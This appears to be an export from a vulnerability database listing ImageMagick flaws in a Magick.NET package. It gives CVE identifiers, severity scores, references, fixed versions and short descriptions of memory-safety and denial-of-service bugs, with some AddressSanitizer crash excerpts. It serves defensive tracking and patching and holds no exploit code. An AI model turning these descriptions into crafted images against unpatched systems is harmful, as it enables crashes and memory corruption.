affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25967, GHSA-72hf-fj62-w6j4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bd1g-sfsp-37h7
20
url VCID-bw4q-dt1r-y3e4
vulnerability_id VCID-bw4q-dt1r-y3e4
summary 
ImageMagick has heap-based buffer overflow in UHDR encoder
A heap-based buffer overflow in the UHDR encoder can happen due to truncation of a value and it would allow an out of bounds write.

```
================================================================
==2158399==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x521000039500 at pc 0x562a4a42f968 bp 0x7ffcca4ed6c0 sp 0x7ffcca4ed6b0
WRITE of size 1 at 0x521000039500 thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30931.json
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30931.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30931
reference_id
reference_type
scores
0
value 0.00015
scoring_system epss
scoring_elements 0.02811
published_at 2026-04-09T12:55:00Z
1
value 0.00015
scoring_system epss
scoring_elements 0.02791
published_at 2026-04-08T12:55:00Z
2
value 0.00015
scoring_system epss
scoring_elements 0.02787
published_at 2026-04-07T12:55:00Z
3
value 0.00015
scoring_system epss
scoring_elements 0.02779
published_at 2026-04-04T12:55:00Z
4
value 0.00015
scoring_system epss
scoring_elements 0.02764
published_at 2026-04-02T12:55:00Z
5
value 0.00017
scoring_system epss
scoring_elements 0.04009
published_at 2026-04-21T12:55:00Z
6
value 0.00017
scoring_system epss
scoring_elements 0.03945
published_at 2026-04-11T12:55:00Z
7
value 0.00017
scoring_system epss
scoring_elements 0.03928
published_at 2026-04-12T12:55:00Z
8
value 0.00017
scoring_system epss
scoring_elements 0.03899
published_at 2026-04-13T12:55:00Z
9
value 0.00017
scoring_system epss
scoring_elements 0.03878
published_at 2026-04-16T12:55:00Z
10
value 0.00017
scoring_system epss
scoring_elements 0.03889
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30931
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-h95r-c8c7-mrwx
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:53:03Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-h95r-c8c7-mrwx
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30931
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30931
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445900
reference_id 2445900
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445900
8
reference_url https://github.com/advisories/GHSA-h95r-c8c7-mrwx
reference_id GHSA-h95r-c8c7-mrwx
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-h95r-c8c7-mrwx
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-30931, GHSA-h95r-c8c7-mrwx
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bw4q-dt1r-y3e4
21
url VCID-cbqr-aybx-d3e6
vulnerability_id VCID-cbqr-aybx-d3e6
summary 
ImageMagick has Use After Free in MSLStartElement in "coders/msl.c"
A crafted MSL script triggers a heap-use-after-free. The operation element handler replaces and frees the image while the parser continues reading from it, leading to a UAF in ReadBlobString during further parsing.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25983.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25983.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25983
reference_id
reference_type
scores
0
value 0.00029
scoring_system epss
scoring_elements 0.0822
published_at 2026-04-21T12:55:00Z
1
value 0.00029
scoring_system epss
scoring_elements 0.08062
published_at 2026-04-18T12:55:00Z
2
value 0.00029
scoring_system epss
scoring_elements 0.08076
published_at 2026-04-16T12:55:00Z
3
value 0.00029
scoring_system epss
scoring_elements 0.0818
published_at 2026-04-13T12:55:00Z
4
value 0.00029
scoring_system epss
scoring_elements 0.08197
published_at 2026-04-12T12:55:00Z
5
value 0.00029
scoring_system epss
scoring_elements 0.08218
published_at 2026-04-11T12:55:00Z
6
value 0.00029
scoring_system epss
scoring_elements 0.08227
published_at 2026-04-09T12:55:00Z
7
value 0.00029
scoring_system epss
scoring_elements 0.08209
published_at 2026-04-08T12:55:00Z
8
value 0.00029
scoring_system epss
scoring_elements 0.08141
published_at 2026-04-07T12:55:00Z
9
value 0.00029
scoring_system epss
scoring_elements 0.08147
published_at 2026-04-02T12:55:00Z
10
value 0.00029
scoring_system epss
scoring_elements 0.08193
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25983
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25983
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25983
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/257200cb21de23404dce5f8261871845d425dee5
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/257200cb21de23404dce5f8261871845d425dee5
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fwqw-2x5x-w566
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:04:31Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fwqw-2x5x-w566
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25983
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25983
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442113
reference_id 2442113
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442113
10
reference_url https://github.com/advisories/GHSA-fwqw-2x5x-w566
reference_id GHSA-fwqw-2x5x-w566
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fwqw-2x5x-w566
11
reference_url https://usn.ubuntu.com/8069-1/
reference_id USN-8069-1
reference_type
scores
url https://usn.ubuntu.com/8069-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25983, GHSA-fwqw-2x5x-w566
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-cbqr-aybx-d3e6
22
url VCID-cuhw-ew1g-s3h2
vulnerability_id VCID-cuhw-ew1g-s3h2
summary 
ImageMagick has Heap Use-After-Free in ImageMagick MSL decoder
A heap use-after-free vulnerability in ImageMagick's MSL decoder allows an attacker to trigger access to freed memory by crafting an MSL file.

```
=================================================================
==1500633==ERROR: AddressSanitizer: heap-use-after-free on address 0x527000011550 at pc 0x5612583fa212 bp 0x7ffedb86d160 sp 0x7ffedb86d150
READ of size 8 at 0x527000011550 thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28687.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28687.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28687
reference_id
reference_type
scores
0
value 0.00054
scoring_system epss
scoring_elements 0.17042
published_at 2026-04-09T12:55:00Z
1
value 0.00054
scoring_system epss
scoring_elements 0.16984
published_at 2026-04-08T12:55:00Z
2
value 0.00054
scoring_system epss
scoring_elements 0.16896
published_at 2026-04-07T12:55:00Z
3
value 0.00054
scoring_system epss
scoring_elements 0.17114
published_at 2026-04-04T12:55:00Z
4
value 0.00054
scoring_system epss
scoring_elements 0.17059
published_at 2026-04-02T12:55:00Z
5
value 0.00059
scoring_system epss
scoring_elements 0.18402
published_at 2026-04-21T12:55:00Z
6
value 0.00059
scoring_system epss
scoring_elements 0.1852
published_at 2026-04-11T12:55:00Z
7
value 0.00059
scoring_system epss
scoring_elements 0.18472
published_at 2026-04-12T12:55:00Z
8
value 0.00059
scoring_system epss
scoring_elements 0.18421
published_at 2026-04-13T12:55:00Z
9
value 0.00059
scoring_system epss
scoring_elements 0.18365
published_at 2026-04-16T12:55:00Z
10
value 0.00059
scoring_system epss
scoring_elements 0.18377
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28687
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28687
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28687
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fpvf-frm6-625q
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-10T16:01:50Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fpvf-frm6-625q
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28687
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28687
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445897
reference_id 2445897
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445897
9
reference_url https://github.com/advisories/GHSA-fpvf-frm6-625q
reference_id GHSA-fpvf-frm6-625q
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fpvf-frm6-625q
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-28687, GHSA-fpvf-frm6-625q
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-cuhw-ew1g-s3h2
23
url VCID-d8yf-8rff-3yhf
vulnerability_id VCID-d8yf-8rff-3yhf
summary 
ImageMagick has a possible infinite loop in its JPEG encoder when using `jpeg:extent`
A `continue` statement in the JPEG extent binary search loop in the jpeg encoder causes an infinite loop when writing persistently fails. An attacker can trigger a 100% CPU consumption and process hang (Denial of Service) with a crafted image.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26283.json
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26283.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-26283
reference_id
reference_type
scores
0
value 0.00019
scoring_system epss
scoring_elements 0.05114
published_at 2026-04-21T12:55:00Z
1
value 0.00019
scoring_system epss
scoring_elements 0.04966
published_at 2026-04-18T12:55:00Z
2
value 0.00019
scoring_system epss
scoring_elements 0.04956
published_at 2026-04-16T12:55:00Z
3
value 0.00019
scoring_system epss
scoring_elements 0.05016
published_at 2026-04-13T12:55:00Z
4
value 0.00019
scoring_system epss
scoring_elements 0.05033
published_at 2026-04-12T12:55:00Z
5
value 0.00019
scoring_system epss
scoring_elements 0.05051
published_at 2026-04-11T12:55:00Z
6
value 0.00019
scoring_system epss
scoring_elements 0.05072
published_at 2026-04-09T12:55:00Z
7
value 0.00019
scoring_system epss
scoring_elements 0.05057
published_at 2026-04-08T12:55:00Z
8
value 0.00019
scoring_system epss
scoring_elements 0.05024
published_at 2026-04-07T12:55:00Z
9
value 0.00019
scoring_system epss
scoring_elements 0.04976
published_at 2026-04-02T12:55:00Z
10
value 0.00019
scoring_system epss
scoring_elements 0.05003
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-26283
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26283
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26283
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/c448c6920a985872072fc7be6034f678c087de9b
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/c448c6920a985872072fc7be6034f678c087de9b
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gwr3-x37h-h84v
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-24T20:47:27Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gwr3-x37h-h84v
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-26283
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-26283
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442140
reference_id 2442140
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442140
10
reference_url https://github.com/advisories/GHSA-gwr3-x37h-h84v
reference_id GHSA-gwr3-x37h-h84v
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gwr3-x37h-h84v
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-26283, GHSA-gwr3-x37h-h84v
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d8yf-8rff-3yhf
24
url VCID-dabd-m3mf-3ker
vulnerability_id VCID-dabd-m3mf-3ker
summary 
ImageMagick has Heap Buffer Over-Read in BilateralBlurImage
BilateralBlurImage contains a heap buffer over-read caused by an incorrect conversion. When processing a crafted image with the `-bilateral-blur` operation an out of bounds read can occur.

```
=================================================================
==676172==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50a0000079c0 at pc 0x57b483c722f7 bp 0x7fffc0acd380 sp 0x7fffc0acd370
READ of size 4 at 0x50a0000079c0 thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30935.json
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30935.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30935
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02441
published_at 2026-04-09T12:55:00Z
1
value 0.00014
scoring_system epss
scoring_elements 0.02421
published_at 2026-04-08T12:55:00Z
2
value 0.00014
scoring_system epss
scoring_elements 0.02416
published_at 2026-04-07T12:55:00Z
3
value 0.00014
scoring_system epss
scoring_elements 0.02417
published_at 2026-04-04T12:55:00Z
4
value 0.00014
scoring_system epss
scoring_elements 0.02407
published_at 2026-04-02T12:55:00Z
5
value 0.00015
scoring_system epss
scoring_elements 0.03052
published_at 2026-04-21T12:55:00Z
6
value 0.00015
scoring_system epss
scoring_elements 0.02977
published_at 2026-04-11T12:55:00Z
7
value 0.00015
scoring_system epss
scoring_elements 0.02954
published_at 2026-04-12T12:55:00Z
8
value 0.00015
scoring_system epss
scoring_elements 0.02945
published_at 2026-04-13T12:55:00Z
9
value 0.00015
scoring_system epss
scoring_elements 0.02921
published_at 2026-04-16T12:55:00Z
10
value 0.00015
scoring_system epss
scoring_elements 0.02931
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30935
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cqw9-w2m7-r2m2
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:50:49Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cqw9-w2m7-r2m2
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30935
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30935
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445899
reference_id 2445899
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445899
8
reference_url https://github.com/advisories/GHSA-cqw9-w2m7-r2m2
reference_id GHSA-cqw9-w2m7-r2m2
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cqw9-w2m7-r2m2
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-30935, GHSA-cqw9-w2m7-r2m2
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-dabd-m3mf-3ker
25
url VCID-dtza-65ku-aber
vulnerability_id VCID-dtza-65ku-aber
summary 
ImageMagick has NULL pointer dereference in ReadSFWImage after DestroyImageInfo (sfw.c)
In `ReadSFWImage()` (`coders/sfw.c`), when temporary file creation fails, `read_info` is destroyed before its `filename` member is accessed, causing a NULL pointer dereference and crash.

```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1414421==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x56260222912f bp 0x7ffec0a193b0 sp 0x7ffec0a19360 T0)
